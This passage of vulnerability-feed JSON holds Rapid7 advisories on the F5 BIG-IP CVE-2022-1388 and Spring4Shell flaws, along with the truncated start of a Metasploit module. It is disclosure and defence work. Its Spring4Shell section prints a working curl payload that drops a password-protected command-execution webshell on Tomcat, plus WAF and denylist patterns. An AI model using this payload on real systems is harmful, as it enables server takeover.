"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-07-28T14:00:00", "id": "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "href": "https://blog.rapid7.com/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T19:31:05", "description": "\n\nOn May 4, 2022, F5 released [an advisory](<https://support.f5.com/csp/article/K55879220>) listing several vulnerabilities, including [CVE-2022-1388](<https://support.f5.com/csp/article/K23605346>), a critical authentication bypass that leads to remote code execution in iControl REST with a CVSSv3 base score of 9.8.\n\nThe vulnerability affects several different versions of BIG-IP prior to 17.0.0, including:\n\n * F5 BIG-IP 16.1.0 - 16.1.2 (patched in 16.1.2.2)\n * F5 BIG-IP 15.1.0 - 15.1.5 (patched in 15.1.5.1)\n * F5 BIG-IP 14.1.0 - 14.1.4 (patched in 14.1.4.6)\n * F5 BIG-IP 13.1.0 - 13.1.4 (patched in 13.1.5)\n * F5 BIG-IP 12.1.0 - 12.1.6 (no patch available, will not fix)\n * F5 BIG-IP 11.6.1 - 11.6.5 (no patch available, will not fix)\n\nOn Monday, May 9, 2022, [Horizon3](<https://www.horizon3.ai/>) released a [full proof of concept](<https://github.com/horizon3ai/CVE-2022-1388>), which we successfully executed to get a root shell. Other groups have [developed exploits](<https://www.bleepingcomputer.com/news/security/exploits-created-for-critical-f5-big-ip-flaw-install-patch-immediately/>) as well.\n\nOver the past few days, [BinaryEdge](<https://www.binaryedge.io/>) has detected an increase in [scanning and exploitation](<https://twitter.com/Balgan/status/1523683322446381059>) for F5 BIG-IP. Others on Twitter have also [observed exploitation attempts](<https://twitter.com/1ZRR4H/status/1523572874061422593>). 
Due to the ease of exploiting this vulnerability, the public exploit code, and the fact that it provides root access, exploitation attempts are likely to increase.\n\nWidespread exploitation is somewhat mitigated by the small number of internet-facing F5 BIG-IP devices, however; our best guess is that there are only [about 2,500 targets on the internet](<https://twitter.com/Junior_Baines/status/1522205355287228416>).\n\n## Mitigation guidance\n\nF5 customers should patch their BIG-IP devices as quickly as possible using [F5's upgrade instructions](<https://support.f5.com/csp/article/K84205182>). Additionally, the management port for F5 BIG-IP devices (and any similar appliance) should be tightly controlled at the network level \u2014 only authorized users should be able to reach the management interface at all.\n\nF5 also [provides a workaround as part of their advisory](<https://support.f5.com/csp/article/K23605346>). If patching and network segmentation are not possible, the workaround should prevent exploitation. We always advise patching rather than relying solely on workarounds.\n\nExploit attempts appear in at least [two different log files](<https://twitter.com/n0x08/status/1523701663290122240>):\n\n * /var/log/audit\n * /var/log/restjavad-audit.0.log\n\nBecause this vulnerability is a root compromise, successful exploitation may be very difficult to recover from. At a minimum, affected BIG-IP devices should be rebuilt from scratch, and certificates and passwords should be rotated.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-1388 with an authenticated [vulnerability check](<https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2022-1388/>) in the May 5, 2022 content release. 
This release also includes authenticated vulnerability checks for additional CVEs in F5's [May 2022 security advisory](<https://support.f5.com/csp/article/K55879220>).\n\n_**Additional reading:**_\n\n * _[Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954](<https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/>)_\n * _[Opportunistic Exploitation of WSO2 CVE-2022-29464](<https://www.rapid7.com/blog/post/2022/04/22/opportunistic-exploitation-of-wso2-cve-2022-29464/>)_\n * _[Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>)_\n * _[CVE-2022-0847: Arbitrary File Overwrite Vulnerability in Linux Kernel](<https://www.rapid7.com/blog/post/2022/03/09/cve-2022-0847-arbitrary-file-overwrite-vulnerability-in-linux-kernel/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T17:57:00", "type": "rapid7blog", "title": "Active Exploitation of F5 BIG-IP iControl REST CVE-2022-1388", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0847", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22965", "CVE-2022-29464"], "modified": "2022-05-09T17:57:00", "id": "RAPID7BLOG:07CA09B4E3B3835E096AA56546C43E8E", "href": "https://blog.rapid7.com/2022/05/09/active-exploitation-of-f5-big-ip-icontrol-rest-cve-2022-1388/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-08T21:29:15", "description": "\n\n_Rapid7 has completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. For further information and updates about our internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>)._\n\nIf you are like many in the cybersecurity industry, any mention of a zero-day in an open-source software (OSS) library may cause a face-palm or audible groans, especially given the fast-follow from the [Log4j vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>). While discovery and research is evolving, we\u2019re posting the facts we\u2019ve gathered and updating guidance as new information becomes available.\n\n## What Rapid7 Customers Can Expect\n\nThis is an evolving incident. Our team is continuing to investigate and validate additional information about this vulnerability and its impact. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. 
CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates.\n\n### Vulnerability Risk Management\n\nThe April 1, 2022 content update released at 7:30 PM EDT contains authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release the week of April 11 to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable. We also have an authenticated Windows check available as of the April 7th content release, which requires the April 6th product release (version 6.6.135). More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### Application Security\n\nA block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy. 
tCell will also detect certain types of exploitation attempts based on publicly available payloads, and will also alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE-2022-22965) are loaded by the application.\n\nInsightAppSec customers can scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>) released April 1, 2022. For guidance on securing applications against Spring4Shell, read our [blog here](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>).\n\n### Cloud Security\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nIf the vulnerability is detected in a customer environment, they can leverage filters in InsightCloudSec to focus specifically on the highest risk resources, such as those on a public subnet, to help prioritize remediation. Users can also create a bot to either automatically notify resource owners of the existence of the vulnerability or automatically shut down vulnerable instances in their environment.\n\n### InsightIDR and Managed Detection and Response\n\nWhile InsightIDR does not have a direct detection available for this exploit, we do have behavior-based detection mechanisms in place to alert on common follow-on attacker activity.\n\n## Introduction\n\nOur team is continuing to investigate and validate additional information about this vulnerability and its impact. 
This is a quickly evolving incident, and we are researching development of both assessment capabilities for our vulnerability management and application security solutions and options for preventive controls. As additional information becomes available, we will evaluate the feasibility of vulnerability checks, attack modules, detections, and Metasploit modules.\n\nWhile Rapid7 does not have a direct detection in place for this exploit, we do have behavior-based detection mechanisms in place to alert on common follow-on attacker activity. tCell will also detect certain types of exploitation based on publicly available payloads.\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates. Our next update will be at noon EDT on March 31, 2022.\n\nOn March 30, 2022, rumors began to circulate about an unpatched remote code execution vulnerability in Spring Framework when a Chinese-speaking [researcher](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>) published a [GitHub commit](<https://github.com/helloexp/0day/tree/14757a536fcedc8f4436fed6efb4e0846fc11784/22-Spring%20Core>) that contained proof-of-concept (PoC) exploit code. The exploit code targeted a zero-day vulnerability in the Spring Core module of the Spring Framework. Spring is maintained by [Spring.io](<https://spring.io/>) (a subsidiary of VMware) and is used by many Java-based enterprise software frameworks. 
The vulnerability in the leaked proof of concept, which appeared to allow unauthenticated attackers to execute code on target systems, was quickly [deleted](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>).\n\n\n\nA lot of confusion followed for several reasons: First, the vulnerability (and proof of concept) isn\u2019t exploitable with out-of-the-box installations of Spring Framework. The application has to use specific functionality, which we explain below. Second, a completely different unauthenticated RCE vulnerability was [published](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) March 29, 2022 for Spring Cloud, which led some in the community to conflate the two unrelated vulnerabilities.\n\nRapid7\u2019s research team can confirm the zero-day vulnerability is real and provides unauthenticated remote code execution. Proof-of-concept exploits exist, but it\u2019s currently unclear which real-world applications use the vulnerable functionality. As of March 31, Spring has also [confirmed the vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. 
It affects Spring MVC and Spring WebFlux applications running on JDK 9+.\n\n## Known risk\n\nThe following conditions map to known risk so far:\n\n * Any components using Spring Framework versions before 5.2.20, 5.3.18 **AND** JDK version 9 or higher **are considered [potentially vulnerable](<https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751>)**;\n * Any components that meet the above conditions **AND** are using @RequestMapping annotation and Plain Old Java Object (POJO) parameters **are considered actually vulnerable** and are at some risk of being exploited;\n * Any components that meet the above conditions **AND** are running Tomcat **are _currently_ most at risk of being exploited** (due to [readily available exploit code](<https://github.com/craig/SpringCore0day>) that is known to work against Tomcat-based apps).\n\n## Recreating exploitation\n\nThe vulnerability appears to affect functions that use the [@RequestMapping](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/bind/annotation/RequestMapping.html>) annotation and POJO (Plain Old Java Object) parameters. Here is an example we hacked into a [Springframework MVC demonstration](<https://github.com/RameshMF/spring-mvc-tutorial/tree/master/springmvc5-helloworld-exmaple>):\n \n \n package net.javaguides.springmvc.helloworld.controller;\n \n import org.springframework.stereotype.Controller;\n import org.springframework.web.bind.annotation.InitBinder;\n import org.springframework.web.bind.annotation.RequestMapping;\n \n import net.javaguides.springmvc.helloworld.model.HelloWorld;\n \n /**\n * @author Ramesh Fadatare\n */\n @Controller\n public class HelloWorldController {\n \n \t@RequestMapping(\"/rapid7\")\n \tpublic void vulnerable(HelloWorld model) {\n \t}\n }\n \n\nHere we have a controller (`HelloWorldController`) that, when loaded into Tomcat, will handle HTTP requests to `http://name/appname/rapid7`. 
The function that handles the request is called `vulnerable` and has a POJO parameter `HelloWorld`. Here, `HelloWorld` is stripped down but POJO can be quite complicated if need be:\n \n \n package net.javaguides.springmvc.helloworld.model;\n \n public class HelloWorld {\n \tprivate String message;\n }\n \n\nAnd that\u2019s it. That\u2019s the entire exploitable condition, from at least Spring Framework versions 4.3.0 through 5.3.15. (We have not explored further back than 4.3.0.)\n\nIf we compile the project and host it on Tomcat, we can then exploit it with the following `curl` command. Note the following uses the exact same payload used by the original proof of concept created by the researcher (more on the payload later):\n \n \n curl -v -d \"class.module.classLoader.resources.context.parent.pipeline\n .first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%\n 22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt\n ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%\n 20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20\n while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7\n D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context\n .parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources\n .context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl\n assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl\n ass.module.classLoader.resources.context.parent.pipeline.first.fileDat\n eFormat=\" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-\n SNAPSHOT/rapid7\n \n\nThis payload drops a password protected webshell in the Tomcat ROOT directory called `tomcatwar.jsp`, and it looks like this:\n \n \n - if(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in\n = -.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();\n int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out.\n 
 println(new String(b)); } } -\n \n\nAttackers can then invoke commands. Here is an example of executing `whoami` to get `albinolobster`:\n\n\n\nThe Java version does appear to matter. Testing on OpenJDK 1.8.0_312 fails, but OpenJDK 11.0.14.1 works.\n\n## About the payload\n\nThe payload we\u2019ve used is specific to Tomcat servers. It uses a technique that was popular as far back as 2014 and that alters the **Tomcat** server\u2019s logging properties via ClassLoader. The payload simply redirects the logging logic to the `ROOT` directory and drops the file + payload. A good technical write up can be found [here](<https://hacksum.net/2014/04/28/cve-2014-0094-apache-struts-security-bypass-vulnerability/>).\n\nThis is just one possible payload and will not be the only one. We\u2019re certain that malicious class loading payloads will appear quickly.\n\n## Mitigation guidance\n\nAs of March 31, 2022, CVE-2022-22965 has been assigned and Spring Framework versions 5.3.18 and 5.2.20 have been released to address it. Spring Framework users should update to the fixed versions starting with internet-exposed applications that meet criteria for vulnerability (see `Known Risk`). As organizations build an inventory of affected applications, they should also look to gain visibility into process execution and application logs to monitor for anomalous activity.\n\nFurther information on the vulnerability and ongoing guidance are being provided in [Spring\u2019s blog here](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). The Spring [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>) for DataBinder explicitly notes that:\n\n\u2026there are potential security implications in failing to set an array of allowed fields. 
In the case of HTTP form POST data for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\n\nTherefore, one line of defense would be to modify source code of custom Spring applications to ensure those field guardrails are in place. Organizations that use third-party applications susceptible to this newly discovered weakness cannot take advantage of this approach.\n\nIf your organization has a web application firewall (WAF) available, profiling any affected Spring-based applications to see what strings can be used in WAF detection rulesets would help prevent malicious attempts to exploit this weakness.\n\nIf an organization is unable to patch or use the above mitigations, one failsafe option is to model process executions on systems that run these Spring-based applications and then monitor for anomalous, \u201cpost-exploitation\u201d attempts. These should be turned into alerts and acted upon immediately via incident responders and security automation. One issue with this approach is the potential for false alarms if the modeling was not comprehensive enough.\n\n## Vulnerability disambiguation\n\nThere has been significant confusion about this zero-day vulnerability because of an unrelated vulnerability in another Spring project that was published March 29, 2022. That vulnerability, [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>), affects Spring Cloud Function, which is not in Spring Framework. Spring released versions 3.1.7 and 3.2.3 to address CVE-2022-22963 on March 29.\n\nFurther, yet another vulnerability, [CVE-2022-22950](<https://tanzu.vmware.com/security/cve-2022-22950>), was assigned on March 28. A fix was released on the same day. 
To keep things confusing, this medium severity vulnerability (which can cause a DoS condition) DOES affect Spring Framework versions 5.3.0 - 5.3.16.\n\n## Updates\n\n### March 30, 2020 - 9PM EDT\n\nThe situation continues to evolve but Spring.IO has yet to confirm the vulnerability. That said, we are actively testing exploit techniques and combinations. In the interim, for organizations that have large deployments of the core Spring Framework or use it for business-critical applications, we have validated the following two mitigations. Rapid7 Labs has not yet seen evidence of exploitation in the wild.\n\n#### WAF Rules\n\nAs referenced previously and reported elsewhere, string filters offer an effective deterrent for organizations that have WAF technology: `class.*`, `Class.*`, `*.class.*`, and `*.Class.*`. These should be tested prior to production deployment but are effective mitigation techniques.\n\n#### Spring Framework Controller advice\n\nOur friends at [Praetorian](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>) have suggested a heavy but validated mitigation strategy that uses the Spring Framework to disallow certain patterns, in this case any invocation containing \u201cclass\u201d. Praetorian\u2019s example is provided below. 
The heavy lift requires recompiling code, but for those with few options it does prevent exploitation.\n\n    import org.springframework.core.Ordered;\n    import org.springframework.core.annotation.Order;\n    import org.springframework.web.bind.WebDataBinder;\n    import org.springframework.web.bind.annotation.ControllerAdvice;\n    import org.springframework.web.bind.annotation.InitBinder;\n\n    @ControllerAdvice\n    @Order(10000)\n    public class BinderControllerAdvice {\n        @InitBinder\n        public void setAllowedFields(WebDataBinder dataBinder) {\n            // Refuse to bind any request parameter whose name reaches the \"class\" property\n            String[] denylist = new String[]{\"class.*\", \"Class.*\", \"*.class.*\", \"*.Class.*\"};\n            dataBinder.setDisallowedFields(denylist);\n        }\n    }\n\n### March 31, 2022 - 7 AM EDT\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and is working on an emergency release. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+.\n\nOur next update will be at noon EDT on March 31, 2022.\n\n### March 31, 2022 - 10 AM EDT\n\nCVE-2022-22965 has been assigned to this vulnerability. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it.\n\n### March 31, 2022 - 12 PM EDT\n\nWe have added a `Known Risk` section to the blog to help readers understand the conditions required for applications to be potentially or known vulnerable.\n\nOur team is testing ways of detecting the vulnerability generically and will update on VM and appsec coverage feasibility by 4 PM EDT today (March 31, 2022).\n\n### March 31, 2022 - 4 PM EDT\n\ntCell will alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE-2022-22965) are loaded by the application. The tCell team is also working on adding a specific detection for Spring4Shell. 
An InsightAppSec attack module is under development and will be released to all application security customers (ETA April 1, 2022). We will publish additional guidance and detail for application security customers tomorrow, on April 1.\n\nInsightVM customers utilizing Container Security can now assess containers that have been built with a vulnerable version of Spring. At this time we are not able to identify vulnerable JAR files embedded with WAR files in all cases, which we are working on improving. Our team is continuing to test ways of detecting the vulnerability and will provide another update on the feasibility of VM coverage at 9 PM EDT.\n\n### March 31, 2022 - 9 PM EDT\n\nMultiple [reports](<https://twitter.com/bad_packets/status/1509603994166956049>) have indicated that attackers are scanning the internet for applications vulnerable to Spring4Shell. There are several reports of exploitation in the wild. SANS Internet Storm Center [confirmed exploitation in the wild](<https://isc.sans.edu/forums/diary/Spring+Vulnerability+Update+Exploitation+Attempts+CVE202222965/28504/>) earlier today.\n\nOur team is working on both authenticated and remote vulnerability checks for InsightVM and Nexpose customers. We will provide more specific ETAs in our next update at 11 AM EDT on April 1.\n\n### April 1, 2022 - 11 AM EDT\n\nOur team is continuing to test ways of detecting CVE-2022-22965 and expects to have an authenticated check for Unix-like systems available to InsightVM and Nexpose customers in today\u2019s (April 1) content release. We are also continuing to research remote check capabilities and will be working on adding InsightAgent support in the coming days. Our next update will be at 3 PM EDT on April 1, 2022.\n\nFor information and updates about Rapid7\u2019s internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>). 
At this time, we have not detected any successful exploit attempts in our systems or solutions.\n\n### April 1, 2022 - 3 PM EDT\n\nOur team intends to include an authenticated check for InsightVM and Nexpose customers in a content-only release this evening (April 1). We will update this blog at or before 10 PM EDT with the status of that release.\n\nAs of today, a new block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy.\n\n### April 1 - 7:30 PM EDT\n\nInsightVM and Nexpose customers can now scan their environments for Spring4Shell with authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release next week to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable.\n\nOur team is actively working on a Windows authenticated check as well as improvements to the authenticated Unix and remote checks. 
More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nInsightAppSec customers can now scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>). A [blog is available](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>) on securing your applications against Spring4Shell.\n\n### April 4 - 2 PM EDT\n\nApplication Security customers with on-prem scan engines now have access to the updated Remote Code Execution (RCE) module which specifically tests for Spring4Shell.\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nOur next update will be at 6 PM EDT.\n\n### April 4 - 6 PM EDT\n\nOur team is continuing to actively work on a Windows authenticated check as well as accuracy improvements to both the authenticated Unix and remote checks.\n\nOur next update will be at or before 6pm EDT tomorrow (April 5).\n\n### April 5 - 6 PM EDT\n\nA product release of InsightVM (version 6.6.135) is scheduled for tomorrow, April 6, 2022. It will include authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. 
A vulnerability check making use of this fingerprinting will be released later this week.\n\nWe have also received some reports of false positive results from the remote check for CVE-2022-22965; a fix for this is expected in tomorrow\u2019s (April 6) **content release**. This week\u2019s Insight Agent release, expected to be generally available on April 7, will also add support for the authenticated Unix check for CVE-2022-22965.\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### April 6 - 6 PM EDT\n\nToday\u2019s product release of InsightVM (version 6.6.135) includes authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nToday\u2019s content release, available as of 6pm EDT, contains a fix for false positives some customers were experiencing with our remote (HTTP-based) check when scanning Microsoft IIS servers.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), expected to be generally available by Friday April 8, will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 7 - 5:30 PM EDT\n\nToday\u2019s content release for InsightVM and Nexpose (available as of 4:30pm EDT) contains a new authenticated vulnerability check for Spring Framework on Windows systems. The April 6 product release (version 6.6.135) is required for this check. 
Note that this functionality requires the \u201cEnable Windows File System Search\u201d option to be set in the scan template.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), which will be generally available tomorrow (April 8), will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 8 - 3 PM EDT\n\nThe Insight Agent release (version 3.1.4.48) to add data collection support for Spring4Shell on macOS and Linux is now expected to be available starting the week of April 11, 2022.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T22:33:54", "type": "rapid7blog", "title": "Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2021-44228", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T22:33:54", "id": 
"RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "href": "https://blog.rapid7.com/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-05-10T15:36:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "packetstorm", "title": "Spring4Shell Spring Framework Class Property Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-10T00:00:00", "id": "PACKETSTORM:167011", "href": "https://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ManualRanking # It's going to manipulate the Class Loader \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude 
